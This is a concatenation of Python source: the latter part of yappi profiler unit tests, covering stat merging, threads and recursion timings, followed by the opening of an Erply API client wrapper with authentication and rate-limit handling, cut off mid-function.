self.assertEqual(ct, 2)
def test_merge_stats(self):
_timings = {"a_1":15,"b_1":14,"c_1":12,"d_1":10,"e_1":9,"f_1":7,"g_1":6,"h_1":5,"i_1":1}
_yappi._set_test_timings(_timings)
def a():
b()
def b():
c()
def c():
d()
def d():
e()
def e():
f()
def f():
g()
def g():
h()
def h():
i()
def i():
pass
yappi.start()
a()
a()
yappi.stop()
stats = yappi.get_func_stats()
self.assertRaises(NotImplementedError, stats.save, "", "INVALID_SAVE_TYPE")
stats.save("ystats2.ys")
yappi.clear_stats()
_yappi._set_test_timings(_timings)
yappi.start()
a()
stats = yappi.get_func_stats().add("ystats2.ys")
fsa = utils.find_stat_by_name(stats, "a")
fsb = utils.find_stat_by_name(stats, "b")
fsc = utils.find_stat_by_name(stats, "c")
fsd = utils.find_stat_by_name(stats, "d")
fse = utils.find_stat_by_name(stats, "e")
fsf = utils.find_stat_by_name(stats, "f")
fsg = utils.find_stat_by_name(stats, "g")
fsh = utils.find_stat_by_name(stats, "h")
fsi = utils.find_stat_by_name(stats, "i")
self.assertEqual(fsa.ttot, 45)
self.assertEqual(fsa.ncall, 3)
self.assertEqual(fsa.nactualcall, 3)
self.assertEqual(fsa.tsub, 3)
self.assertEqual(fsa.children[fsb].ttot, fsb.ttot)
self.assertEqual(fsa.children[fsb].tsub, fsb.tsub)
self.assertEqual(fsb.children[fsc].ttot, fsc.ttot)
self.assertEqual(fsb.children[fsc].tsub, fsc.tsub)
self.assertEqual(fsc.tsub, 6)
self.assertEqual(fsc.children[fsd].ttot, fsd.ttot)
self.assertEqual(fsc.children[fsd].tsub, fsd.tsub)
self.assertEqual(fsd.children[fse].ttot, fse.ttot)
self.assertEqual(fsd.children[fse].tsub, fse.tsub)
self.assertEqual(fse.children[fsf].ttot, fsf.ttot)
self.assertEqual(fse.children[fsf].tsub, fsf.tsub)
self.assertEqual(fsf.children[fsg].ttot, fsg.ttot)
self.assertEqual(fsf.children[fsg].tsub, fsg.tsub)
self.assertEqual(fsg.ttot, 18)
self.assertEqual(fsg.tsub, 3)
self.assertEqual(fsg.children[fsh].ttot, fsh.ttot)
self.assertEqual(fsg.children[fsh].tsub, fsh.tsub)
self.assertEqual(fsh.ttot, 15)
self.assertEqual(fsh.tsub, 12)
self.assertEqual(fsh.tavg, 5)
self.assertEqual(fsh.children[fsi].ttot, fsi.ttot)
self.assertEqual(fsh.children[fsi].tsub, fsi.tsub)
#stats.debug_print()
def test_merge_multithreaded_stats(self):
import threading
import _yappi
timings = {"a_1":2, "b_1":1}
_yappi._set_test_timings(timings)
def a(): pass
def b(): pass
yappi.start()
t = threading.Thread(target=a)
t.start()
t.join()
t = threading.Thread(target=b)
t.start()
t.join()
yappi.get_func_stats().save("ystats1.ys")
yappi.clear_stats()
_yappi._set_test_timings(timings)
self.assertEqual(len(yappi.get_func_stats()), 0)
self.assertEqual(len(yappi.get_thread_stats()), 1)
t = threading.Thread(target=a)
t.start()
t.join()
self.assertEqual(_yappi._get_start_flags()["profile_builtins"], 0)
self.assertEqual(_yappi._get_start_flags()["profile_multithread"], 1)
yappi.get_func_stats().save("ystats2.ys")
stats = yappi.YFuncStats(["ystats1.ys", "ystats2.ys",])
fsa = utils.find_stat_by_name(stats, "a")
fsb = utils.find_stat_by_name(stats, "b")
self.assertEqual(fsa.ncall, 2)
self.assertEqual(fsb.ncall, 1)
self.assertEqual(fsa.tsub, fsa.ttot, 4)
self.assertEqual(fsb.tsub, fsb.ttot, 1)
def test_merge_load_different_clock_types(self):
import threading
yappi.start(builtins=True)
def a(): b()
def b(): c()
def c(): pass
t = threading.Thread(target=a)
t.start()
t.join()
yappi.get_func_stats().sort("name", "asc").save("ystats1.ys")
yappi.stop()
yappi.clear_stats()
yappi.start(builtins=False)
t = threading.Thread(target=a)
t.start()
t.join()
yappi.get_func_stats().save("ystats2.ys")
yappi.stop()
self.assertRaises(_yappi.error, yappi.set_clock_type, "wall")
yappi.clear_stats()
yappi.set_clock_type("wall")
yappi.start()
t = threading.Thread(target=a)
t.start()
t.join()
yappi.get_func_stats().save("ystats3.ys")
self.assertRaises(yappi.YappiError, yappi.YFuncStats().add("ystats1.ys").add, "ystats3.ys")
stats = yappi.YFuncStats(["ystats1.ys", "ystats2.ys"]).sort("name")
fsa = utils.find_stat_by_name(stats, "a")
fsb = utils.find_stat_by_name(stats, "b")
fsc = utils.find_stat_by_name(stats, "c")
self.assertEqual(fsa.ncall, 2)
self.assertEqual(fsa.ncall, fsb.ncall, fsc.ncall)
def test_merge_aabab_aabbc(self):
_timings = {"a_1":15,"a_2":14,"b_1":12,"a_3":10,"b_2":9, "c_1":4}
_yappi._set_test_timings(_timings)
def a():
if self._ncall == 1:
self._ncall += 1
a()
elif self._ncall == 5:
self._ncall += 1
a()
else:
b()
def b():
if self._ncall == 2:
self._ncall += 1
a()
elif self._ncall == 6:
self._ncall += 1
b()
elif self._ncall == 7:
c()
else:
return
def c():
pass
self._ncall = 1
stats = utils.run_and_get_func_stats(a,)
stats.save("ystats1.ys")
yappi.clear_stats()
_yappi._set_test_timings(_timings)
#stats.print_all()
self._ncall = 5
stats = utils.run_and_get_func_stats(a,)
stats.save("ystats2.ys")
#stats.print_all()
def a(): # same name but another function(code object)
pass
yappi.start()
a()
stats = yappi.get_func_stats().add(["ystats1.ys", "ystats2.ys"])
#stats.print_all()
self.assertEqual(len(stats), 4)
fsa = None
for stat in stats:
if stat.name == "a" and stat.ttot == 45:
fsa = stat
break
self.assertTrue(fsa is not None)
self.assertEqual(fsa.ncall, 7)
self.assertEqual(fsa.nactualcall, 3)
self.assertEqual(fsa.ttot, 45)
self.assertEqual(fsa.tsub, 10)
fsb = utils.find_stat_by_name(stats, "b")
fsc = utils.find_stat_by_name(stats, "c")
self.assertEqual(fsb.ncall, 6)
self.assertEqual(fsb.nactualcall, 3)
self.assertEqual(fsb.ttot, 36)
self.assertEqual(fsb.tsub, 27)
self.assertEqual(fsb.tavg, 6)
self.assertEqual(fsc.ttot, 8)
self.assertEqual(fsc.tsub, 8)
self.assertEqual(fsc.tavg, 4)
self.assertEqual(fsc.nactualcall, fsc.ncall, 2)
"""
"""
class MultithreadedScenarios(utils.YappiUnitTestCase):
def test_subsequent_profile(self):
import threading
WORKER_COUNT = 5
def a(): pass
def b(): pass
def c(): pass
_timings = {"a_1":3,"b_1":2,"c_1":1,}
yappi.start()
def g(): pass
g()
yappi.stop()
yappi.clear_stats()
_yappi._set_test_timings(_timings)
yappi.start()
_dummy = []
for i in range(WORKER_COUNT):
t = threading.Thread(target=a)
t.start()
t.join()
for i in range(WORKER_COUNT):
t = threading.Thread(target=b)
t.start()
_dummy.append(t)
t.join()
for i in range(WORKER_COUNT):
t = threading.Thread(target=a)
t.start()
t.join()
for i in range(WORKER_COUNT):
t = threading.Thread(target=c)
t.start()
t.join()
yappi.stop()
yappi.start()
def f():
pass
f()
stats = yappi.get_func_stats()
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
fsc = utils.find_stat_by_name(stats, 'c')
self.assertEqual(fsa.ncall, 10)
self.assertEqual(fsb.ncall, 5)
self.assertEqual(fsc.ncall, 5)
self.assertEqual(fsa.ttot, fsa.tsub, 30)
self.assertEqual(fsb.ttot, fsb.tsub, 10)
self.assertEqual(fsc.ttot, fsc.tsub, 5)
# MACOSx optimizes by only creating one worker thread
self.assertTrue(len(yappi.get_thread_stats()) >= 2)
def test_basic(self):
import threading
import time
yappi.set_clock_type('wall')
def a():
time.sleep(0.2)
class Worker1(threading.Thread):
def a(self):
time.sleep(0.3)
def run(self):
self.a()
yappi.start(builtins=False, profile_threads=True)
c = Worker1()
c.start()
c.join()
a()
stats = yappi.get_func_stats()
fsa1 = utils.find_stat_by_name(stats, 'Worker1.a')
fsa2 = utils.find_stat_by_name(stats, 'a')
self.assertTrue(fsa1 is not None)
self.assertTrue(fsa2 is not None)
self.assertTrue(fsa1.ttot > 0.2)
self.assertTrue(fsa2.ttot > 0.1)
tstats = yappi.get_thread_stats()
self.assertEqual(len(tstats), 2)
tsa = utils.find_stat_by_name(tstats, 'Worker1')
tsm = utils.find_stat_by_name(tstats, '_MainThread')
self.assertTrue(tsa is not None)
self.assertTrue(tsm is not None) # FIX: I see this fails sometimes?
def test_ctx_stats(self):
from threading import Thread
DUMMY_WORKER_COUNT = 5
yappi.start()
class DummyThread(Thread): pass
def dummy_worker():
pass
for i in range(DUMMY_WORKER_COUNT):
t = DummyThread(target=dummy_worker)
t.start()
t.join()
yappi.stop()
stats = yappi.get_thread_stats()
tsa = utils.find_stat_by_name(stats, "DummyThread")
self.assertTrue(tsa is not None)
yappi.clear_stats()
import time
time.sleep(1.0)
_timings = {"a_1":6,"b_1":5,"c_1":3, "d_1":1, "a_2":4,"b_2":3,"c_2":2, "d_2":1}
_yappi._set_test_timings(_timings)
class Thread1(Thread): pass
class Thread2(Thread): pass
def a():
b()
def b():
c()
def c():
d()
def d():
time.sleep(0.6)
yappi.set_clock_type("wall")
yappi.start()
t1 = Thread1(target=a)
t1.start()
t2 = Thread2(target=a)
t2.start()
t1.join()
t2.join()
stats = yappi.get_thread_stats()
# the fist clear_stats clears the context table?
tsa = utils.find_stat_by_name(stats, "DummyThread")
self.assertTrue(tsa is None)
tst1 = utils.find_stat_by_name(stats, "Thread1")
tst2 = utils.find_stat_by_name(stats, "Thread2")
tsmain = utils.find_stat_by_name(stats, "_MainThread")
#stats.print_all()
self.assertTrue(len(stats) == 3)
self.assertTrue(tst1 is not None)
self.assertTrue(tst2 is not None)
self.assertTrue(tsmain is not None) # I see this fails sometimes, probably
# because Py_ImportNoBlock() fails to import and get the thread class name
# sometimes.
self.assertTrue(1.0 > tst2.ttot >= 0.5)
self.assertTrue(1.0 > tst1.ttot >= 0.5)
# test sorting of the ctx stats
stats = stats.sort("totaltime", "desc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.ttot >= stat.ttot)
prev_stat = stat
stats = stats.sort("totaltime", "asc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.ttot <= stat.ttot)
prev_stat = stat
stats = stats.sort("schedcount", "desc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.sched_count >= stat.sched_count)
prev_stat = stat
stats = stats.sort("name", "desc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.name >= stat.name)
prev_stat = stat
self.assertRaises(yappi.YappiError, stats.sort, "invalid_thread_sorttype_arg")
self.assertRaises(yappi.YappiError, stats.sort, "invalid_thread_sortorder_arg")
def test_producer_consumer_with_queues(self):
# we currently just stress yappi, no functionality test is done here.
yappi.start()
import time
if utils.is_py3x():
from queue import Queue
else:
from Queue import Queue
from threading import Thread
WORKER_THREAD_COUNT = 50
WORK_ITEM_COUNT = 2000
def worker():
while True:
item = q.get()
# do the work with item
q.task_done()
q = Queue()
for i in range(WORKER_THREAD_COUNT):
t = Thread(target=worker)
t.daemon = True
t.start()
for item in range(WORK_ITEM_COUNT):
q.put(item)
q.join()# block until all tasks are done
#yappi.get_func_stats().sort("callcount").print_all()
yappi.stop()
def test_temporary_lock_waiting(self):
import threading
import time
yappi.start()
_lock = threading.Lock()
def worker():
_lock.acquire()
try:
time.sleep(1.0)
finally:
_lock.release()
t1 = threading.Thread(target=worker)
t2 = threading.Thread(target=worker)
t1.start()
t2.start()
t1.join()
t2.join()
#yappi.get_func_stats().sort("callcount").print_all()
yappi.stop()
@_unittest.skipIf(os.name != "posix", "requires Posix compliant OS")
def test_signals_with_blocking_calls(self):
import signal, os, time
# just to verify if signal is handled correctly and stats/yappi are not corrupted.
def handler(signum, frame):
raise Exception("Signal handler executed!")
yappi.start()
signal.signal(signal.SIGALRM, handler)
signal.alarm(1)
self.assertRaises(Exception, time.sleep, 2)
stats = yappi.get_func_stats()
fsh = utils.find_stat_by_name(stats, "handler")
self.assertTrue(fsh is not None)
@_unittest.skipIf(not sys.version_info >= (3, 2), "requires Python 3.2")
def test_concurrent_futures(self):
yappi.start()
import time
from concurrent.futures import ThreadPoolExecutor
with ThreadPoolExecutor(max_workers=5) as executor:
f = executor.submit(pow, 5, 2)
self.assertEqual(f.result(), 25)
time.sleep(1.0)
yappi.stop()
@_unittest.skipIf(not sys.version_info >= (3, 2), "requires Python 3.2")
def test_barrier(self):
yappi.start()
import threading
b = threading.Barrier(2, timeout=1)
def worker():
try:
b.wait()
except threading.BrokenBarrierError:
pass
except Exception:
raise Exception("BrokenBarrierError not raised")
t1 = threading.Thread(target=worker)
t1.start()
#b.wait()
t1.join()
yappi.stop()
class NonRecursiveFunctions(utils.YappiUnitTestCase):
def test_abcd(self):
_timings = {"a_1":6,"b_1":5,"c_1":3, "d_1":1}
_yappi._set_test_timings(_timings)
def a():
b()
def b():
c()
def c():
d()
def d():
pass
stats = utils.run_and_get_func_stats(a)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
fsc = utils.find_stat_by_name(stats, 'c')
fsd = utils.find_stat_by_name(stats, 'd')
cfsab = fsa.children[fsb]
cfsbc = fsb.children[fsc]
cfscd = fsc.children[fsd]
self.assertEqual(fsa.ttot , 6)
self.assertEqual(fsa.tsub , 1)
self.assertEqual(fsb.ttot , 5)
self.assertEqual(fsb.tsub , 2)
self.assertEqual(fsc.ttot , 3)
self.assertEqual(fsc.tsub , 2)
self.assertEqual(fsd.ttot , 1)
self.assertEqual(fsd.tsub , 1)
self.assertEqual(cfsab.ttot , 5)
self.assertEqual(cfsab.tsub , 2)
self.assertEqual(cfsbc.ttot , 3)
self.assertEqual(cfsbc.tsub , 2)
self.assertEqual(cfscd.ttot , 1)
self.assertEqual(cfscd.tsub , 1)
def test_stop_in_middle(self):
import time
_timings = {"a_1":6,"b_1":4}
_yappi._set_test_timings(_timings)
def a():
b()
yappi.stop()
def b():
time.sleep(0.2)
yappi.start()
a()
stats = yappi.get_func_stats()
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
self.assertEqual(fsa.ncall , 1)
self.assertEqual(fsa.nactualcall, 0)
self.assertEqual(fsa.ttot , 0) # no call_leave called
self.assertEqual(fsa.tsub , 0) # no call_leave called
self.assertEqual(fsb.ttot , 4)
class RecursiveFunctions(utils.YappiUnitTestCase):
def test_fibonacci(self):
def fib(n):
if n > 1:
return fib(n-1) + fib(n-2)
else:
return n
stats = utils.run_and_get_func_stats(fib, 22)
fs = utils.find_stat_by_name(stats, 'fib')
self.assertEqual(fs.ncall, 57313)
self.assertEqual(fs.ttot, fs.tsub)
def test_abcadc(self):
_timings = {"a_1":20,"b_1":19,"c_1":17, "a_2":13, "d_1":12, "c_2":10, "a_3":5}
_yappi._set_test_timings(_timings)
def a(n):
if n == 3:
return
if n == 1 + 1:
d(n)
else:
b(n)
def b(n):
c(n)
def c(n):
a(n+1)
def d(n):
c(n)
stats = utils.run_and_get_func_stats(a, 1)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
fsc = utils.find_stat_by_name(stats, 'c')
fsd = utils.find_stat_by_name(stats, 'd')
self.assertEqual(fsa.ncall, 3)
self.assertEqual(fsa.nactualcall, 1)
self.assertEqual(fsa.ttot, 20)
self.assertEqual(fsa.tsub, 7)
self.assertEqual(fsb.ttot, 19)
self.assertEqual(fsb.tsub, 2)
self.assertEqual(fsc.ttot, 17)
self.assertEqual(fsc.tsub, 9)
self.assertEqual(fsd.ttot, 12)
self.assertEqual(fsd.tsub, 2)
cfsca = fsc.children[fsa]
self.assertEqual(cfsca.nactualcall, 0)
self.assertEqual(cfsca.ncall, 2)
self.assertEqual(cfsca.ttot, 13)
self.assertEqual(cfsca.tsub, 6)
def test_aaaa(self):
_timings = {"d_1":9, "d_2":7, "d_3":3, "d_4":2}
_yappi._set_test_timings(_timings)
def d(n):
if n == 3:
return
d(n+1)
stats = utils.run_and_get_func_stats(d, 0)
fsd = utils.find_stat_by_name(stats, 'd')
self.assertEqual(fsd.ncall , 4)
self.assertEqual(fsd.nactualcall , 1)
self.assertEqual(fsd.ttot , 9)
self.assertEqual(fsd.tsub , 9)
cfsdd = fsd.children[fsd]
self.assertEqual(cfsdd.ttot , 7)
self.assertEqual(cfsdd.tsub , 7)
self.assertEqual(cfsdd.ncall , 3)
self.assertEqual(cfsdd.nactualcall , 0)
def test_abcabc(self):
_timings = {"a_1":20,"b_1":19,"c_1":17, "a_2":13, "b_2":11, "c_2":9, "a_3":6}
_yappi._set_test_timings(_timings)
def a(n):
if n == 3:
return
else:
b(n)
def b(n):
c(n)
def c(n):
a(n+1)
stats = utils.run_and_get_func_stats(a, 1)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
fsc = utils.find_stat_by_name(stats, 'c')
self.assertEqual(fsa.ncall , 3)
self.assertEqual(fsa.nactualcall , 1)
self.assertEqual(fsa.ttot , 20)
self.assertEqual(fsa.tsub , 9)
self.assertEqual(fsb.ttot , 19)
self.assertEqual(fsb.tsub , 4)
self.assertEqual(fsc.ttot , 17)
self.assertEqual(fsc.tsub , 7)
cfsab = fsa.children[fsb]
cfsbc = fsb.children[fsc]
cfsca = fsc.children[fsa]
self.assertEqual(cfsab.ttot , 19)
self.assertEqual(cfsab.tsub , 4)
self.assertEqual(cfsbc.ttot , 17)
self.assertEqual(cfsbc.tsub , 7)
self.assertEqual(cfsca.ttot , 13)
self.assertEqual(cfsca.tsub , 8)
def test_abcbca(self):
_timings = {"a_1":10,"b_1":9,"c_1":7,"b_2":4,"c_2":2,"a_2":1}
_yappi._set_test_timings(_timings)
self._ncall = 1
def a():
if self._ncall == 1:
b()
else:
return
def b():
c()
def c():
if self._ncall == 1:
self._ncall += 1
b()
else:
a()
stats = utils.run_and_get_func_stats(a)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
fsc = utils.find_stat_by_name(stats, 'c')
cfsab = fsa.children[fsb]
cfsbc = fsb.children[fsc]
cfsca = fsc.children[fsa]
self.assertEqual(fsa.ttot , 10)
self.assertEqual(fsa.tsub , 2)
self.assertEqual(fsb.ttot , 9)
self.assertEqual(fsb.tsub , 4)
self.assertEqual(fsc.ttot , 7)
self.assertEqual(fsc.tsub , 4)
self.assertEqual(cfsab.ttot , 9)
self.assertEqual(cfsab.tsub , 2)
self.assertEqual(cfsbc.ttot , 7)
self.assertEqual(cfsbc.tsub , 4)
self.assertEqual(cfsca.ttot , 1)
self.assertEqual(cfsca.tsub , 1)
self.assertEqual(cfsca.ncall , 1)
self.assertEqual(cfsca.nactualcall , 0)
def test_aabccb(self):
_timings = {"a_1":13,"a_2":11,"b_1":9,"c_1":5,"c_2":3,"b_2":1}
_yappi._set_test_timings(_timings)
self._ncall = 1
def a():
if self._ncall == 1:
self._ncall += 1
a()
else:
b()
def b():
if self._ncall == 3:
return
else:
c()
def c():
if self._ncall == 2:
self._ncall += 1
c()
else:
b()
stats = utils.run_and_get_func_stats(a)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
fsc = utils.find_stat_by_name(stats, 'c')
cfsaa = fsa.children[fsa.index]
cfsab = fsa.children[fsb]
cfsbc = fsb.children[fsc.full_name]
cfscc = fsc.children[fsc]
cfscb = fsc.children[fsb]
self.assertEqual(fsb.ttot , 9)
self.assertEqual(fsb.tsub , 5)
self.assertEqual(cfsbc.ttot , 5)
self.assertEqual(cfsbc.tsub , 2)
self.assertEqual(fsa.ttot , 13)
self.assertEqual(fsa.tsub , 4)
self.assertEqual(cfsab.ttot , 9)
self.assertEqual(cfsab.tsub , 4)
self.assertEqual(cfsaa.ttot , 11)
self.assertEqual(cfsaa.tsub , 2)
self.assertEqual(fsc.ttot , 5)
self.assertEqual(fsc.tsub , 4)
def test_abaa(self):
_timings = {"a_1":13,"b_1":10,"a_2":9,"a_3":5}
_yappi._set_test_timings(_timings)
self._ncall = 1
def a():
if self._ncall == 1:
b()
elif self._ncall == 2:
self._ncall += 1
a()
else:
return
def b():
self._ncall += 1
a()
stats = utils.run_and_get_func_stats(a)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
cfsaa = fsa.children[fsa]
cfsba = fsb.children[fsa]
self.assertEqual(fsb.ttot , 10)
self.assertEqual(fsb.tsub , 1)
self.assertEqual(fsa.ttot , 13)
self.assertEqual(fsa.tsub , 12)
self.assertEqual(cfsaa.ttot , 5)
self.assertEqual(cfsaa.tsub , 5)
self.assertEqual(cfsba.ttot , 9)
self.assertEqual(cfsba.tsub , 4)
def test_aabb(self):
_timings = {"a_1":13,"a_2":10,"b_1":9,"b_2":5}
_yappi._set_test_timings(_timings)
self._ncall = 1
def a():
if self._ncall == 1:
self._ncall += 1
a()
elif self._ncall == 2:
b()
else:
return
def b():
if self._ncall == 2:
self._ncall += 1
b()
else:
return
stats = utils.run_and_get_func_stats(a)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
cfsaa = fsa.children[fsa]
cfsab = fsa.children[fsb]
cfsbb = fsb.children[fsb]
self.assertEqual(fsa.ttot , 13)
self.assertEqual(fsa.tsub , 4)
self.assertEqual(fsb.ttot , 9)
self.assertEqual(fsb.tsub , 9)
self.assertEqual(cfsaa.ttot , 10)
self.assertEqual(cfsaa.tsub , 1)
self.assertEqual(cfsab.ttot , 9)
self.assertEqual(cfsab.tsub , 4)
self.assertEqual(cfsbb.ttot , 5)
self.assertEqual(cfsbb.tsub , 5)
def test_abbb(self):
_timings = {"a_1":13,"b_1":10,"b_2":6,"b_3":1}
_yappi._set_test_timings(_timings)
self._ncall = 1
def a():
if self._ncall == 1:
b()
def b():
if self._ncall == 3:
return
self._ncall += 1
b()
stats = utils.run_and_get_func_stats(a)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
cfsab = fsa.children[fsb]
cfsbb = fsb.children[fsb]
self.assertEqual(fsa.ttot , 13)
self.assertEqual(fsa.tsub , 3)
self.assertEqual(fsb.ttot , 10)
self.assertEqual(fsb.tsub , 10)
self.assertEqual(fsb.ncall , 3)
self.assertEqual(fsb.nactualcall , 1)
self.assertEqual(cfsab.ttot , 10)
self.assertEqual(cfsab.tsub , 4)
self.assertEqual(cfsbb.ttot , 6)
self.assertEqual(cfsbb.tsub , 6)
self.assertEqual(cfsbb.nactualcall , 0)
self.assertEqual(cfsbb.ncall , 2)
def test_aaab(self):
_timings = {"a_1":13,"a_2":10,"a_3":6,"b_1":1}
_yappi._set_test_timings(_timings)
self._ncall = 1
def a():
if self._ncall == 3:
b()
return
self._ncall += 1
a()
def b():
return
stats = utils.run_and_get_func_stats(a)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
cfsaa = fsa.children[fsa]
cfsab = fsa.children[fsb]
self.assertEqual(fsa.ttot , 13)
self.assertEqual(fsa.tsub , 12)
self.assertEqual(fsb.ttot , 1)
self.assertEqual(fsb.tsub , 1)
self.assertEqual(cfsaa.ttot , 10)
self.assertEqual(cfsaa.tsub , 9)
self.assertEqual(cfsab.ttot , 1)
self.assertEqual(cfsab.tsub , 1)
def test_abab(self):
_timings = {"a_1":13,"b_1":10,"a_2":6,"b_2":1}
_yappi._set_test_timings(_timings)
self._ncall = 1
def a():
b()
def b():
if self._ncall == 2:
return
self._ncall += 1
a()
stats = utils.run_and_get_func_stats(a)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
cfsab = fsa.children[fsb]
cfsba = fsb.children[fsa]
self.assertEqual(fsa.ttot , 13)
self.assertEqual(fsa.tsub , 8)
self.assertEqual(fsb.ttot , 10)
self.assertEqual(fsb.tsub , 5)
self.assertEqual(cfsab.ttot , 10)
self.assertEqual(cfsab.tsub , 5)
self.assertEqual(cfsab.ncall , 2)
self.assertEqual(cfsab.nactualcall , 1)
self.assertEqual(cfsba.ttot , 6)
self.assertEqual(cfsba.tsub , 5)
|
|
# -*- coding: utf-8 -*-
"""
erply
~~~~~
Simple Python wrapper for Erply API
:copyright: (c) 2014-2016 by Priit Laes
:license: BSD, see LICENSE for details.
"""
from contextlib import closing
from datetime import datetime
from time import sleep
import csv
import requests
class ErplyException(Exception):
pass
class ErplyAPILimitException(ErplyException):
"""Raised when Erply API limit (by default 1000 requests per hour) has
been exceeded.
:param server_time: Erply server time. Can be used to determine amount of
time until API accepts requests again.
"""
def __init__(self, server_time):
self.server_time = server_time
class ErplyPermissionException(Exception):
"""No viewing rights for this item."""
class ErplyAuth(object):
def __init__(self, code, username, password):
self.code = code
self.username = username
self.password = password
@property
def data(self):
return {'username': self.username,
'password': self.password}
class Erply(object):
ERPLY_GET = (
# TODO: This list is still incomplete
'getAddresses'
,'getAddressTypes'
,'getCustomers'
,'getCustomerGroups'
# ,'getDocuments' Unimplemented from ERPLY side :(
,'getEmployees'
,'getProducts'
,'getProductCategories'
,'getProductCostForSpecificAmount' # untested
,'getProductGroups'
,'getProductPrices' # untested, broken ??
,'getProductPriorityGroups' # untested
,'getProductStock' # untested
,'getProductUnits'
,'getPurchaseDocuments'
,'getReports'
,'getSalesDocuments'
,'getServices'
,'getWarehouses'
,'verifyUser'
)
ERPLY_CSV = ('getProductStockCSV', 'getSalesReport')
ERPLY_POST = ('saveProduct',)
def __init__(self, auth, erply_api_url=None, wait_on_limit=False):
self.auth = auth
self._key = None
# Whether to wait for next hour when API limit has been met.
# When False, ErplyAPILimitException will be raised, otherwise
# request will be retried when new hour starts.
self.wait_on_limit = wait_on_limit
# User-specified Erply API url
self.erply_api_url = erply_api_url
@property
def _payload(self):
return {'clientCode': self.auth.code}
@property
def session(self):
def authenticate():
response = self.verifyUser(**self.auth.data)
if response.error:
print("Authentication failed with code {}".format(response.error))
raise ValueError
key = response.fetchone().get('sessionKey', None)
self._key = key
return key
return self._key if self._key else authenticate()
@property
def payload(self):
return dict(sessionKey=self.session, **self._payload)
@property
def api_url(self):
return self.erply_api_url or \
'https://{}.erply.com/api/'.format(self.auth.code)
@property
def headers(self):
return { 'Content-Type': 'application/x-www-form-urlencoded' }
def _parse_response(self, resp, _initial_response=None):
"""Parse API response.
Returns two-tuple containing: `retry` and `data` values:
- `retry` is boolean specifying whether session token was expired
and signalling caller to request new session token and redo the
API with original parameters.
- `data` - dictionary of original json-encoded response.
"""
if resp.status_code != requests.codes.ok:
raise ValueError('Request failed with error {}'.format(resp.status_code))
data = resp.json()
status = data.get('status', {})
if not status:
raise ValueError('Malformed response')
error = status.get('errorCode')
if error == 0:
return False, data
elif error == 1002:
server_time = datetime.fromtimestamp(status.get('requestUnixTime'))
if not self.wait_on_limit:
raise ErplyAPILimitException(server_time)
# Calculate time to sleep until next hour
sleep((60 * (60 - server_time.minute)) + 1)
return True, None
elif error == 1054:
self._key = None
return True, None
elif error == 1060:
# No viewing rights for this item
raise ErplyPermissionException()
field = status.get('errorField')
if field:
raise ErplyException('Erply error: {}, field: {}'.format(error, field))
raise ErplyException('Erply error: {}'.format(error))
def handle_csv(self, request, *args, **kwargs):
data = dict(request=request.replace('CSV', ''), responseType='CSV')
data.update(self.payload)
data.update(**kwargs)
r = requests.post(self.api_url, data=data, headers=self.headers)
retry, parsed_data = self._parse_response(r)
if retry:
return getattr(self, request)(*args, **kwargs)
return ErplyCSVResponse(self, parsed_data)
def handle_get(self, request, _page=None, _response=None, *args, **kwargs):
_is_bulk = kwargs.pop('_is_bulk', False)
data = kwargs.copy()
if _page:
data['pageNo'] = _page + 1
if _is_bulk:
data.update(requestName=request)
return data
data.update(request=request)
data.update(self.payload if request != 'verifyUser' else self._payload)
r = requests.post(self.api_url, data=data, headers=self.headers)
retry, parsed_data = self._parse_response(r)
# Retry request in case of token expiration
if retry:
return getattr(self, request)(_page=_page, _response=_response, *args, **kwargs)
if _response:
_response.populate_page(parsed_data.get('records'), _page)
return ErplyResponse(self, parsed_data, request, _page, *args, **kwargs)
def handle_post(self, request, *args, **kwargs):
_is_bulk = kwargs.pop('_is_bulk', False)
data = kwargs.copy()
if _is_bulk:
data.update(requestName=request)
return data
data.update(request=request)
data.update(self.payload)
r = requests.post(self.api_url, data=data, headers=self.headers)
retry, parsed_data = self._parse_response(r)
# Retry request in case of token expiration
if retry:
return getattr(self, request)(request, *args, **kwargs)
return ErplyResponse(self, parsed_data, request, *args, **kwargs)
def handle_bulk(self, _requests):
data = self.payload
data.update(requests=_requests)
return ErplyBulkResponse(self, requests.post(self.api_url, data=data))
def __getattr__(self, attr):
_attr = None
_is_bulk = len(attr) > 5 and attr.endswith('_bulk')
if _is_bulk:
attr = attr[:-5]
if attr in self.ERPLY_GET:
def method(*args, **kwargs):
_page = kwargs.pop('_page', 0)
_response = kwargs.pop('_response', None)
return self.handle_get(attr, _page, _response, _is_bulk=_is_bulk, *args, **kwargs)
_attr = method
elif attr in self.ERPLY_POST:
def method(*args, **kwargs):
return self.handle_post(attr, _is_bulk=_is_bulk, *args, **kwargs)
_attr = method
elif attr in self.ERPLY_CSV:
def method(*args, **kwargs):
return self.handle_csv(attr, *args, **kwargs)
_attr = method
if _attr:
self.__dict__[attr] = _attr
return _attr
raise AttributeError
class ErplyBulkRequest(object):
def __init__(self, erply, _json_dumps):
self.calls = []
self.erply = erply
self.json_dumper = _json_dumps
def attach(self, attr, *args, **kwargs):
if attr in self.erply.ERPLY_GET or attr in self.erply.ERPLY_POST:
self.calls.append((getattr(self.erply, '{}_bulk'.format(attr)), args, kwargs))
def __call__(self,):
_requests = []
for n, request in enumerate(self.calls, start=1):
_call, _args, _kwargs = request
_kwargs.update(requestID=n)
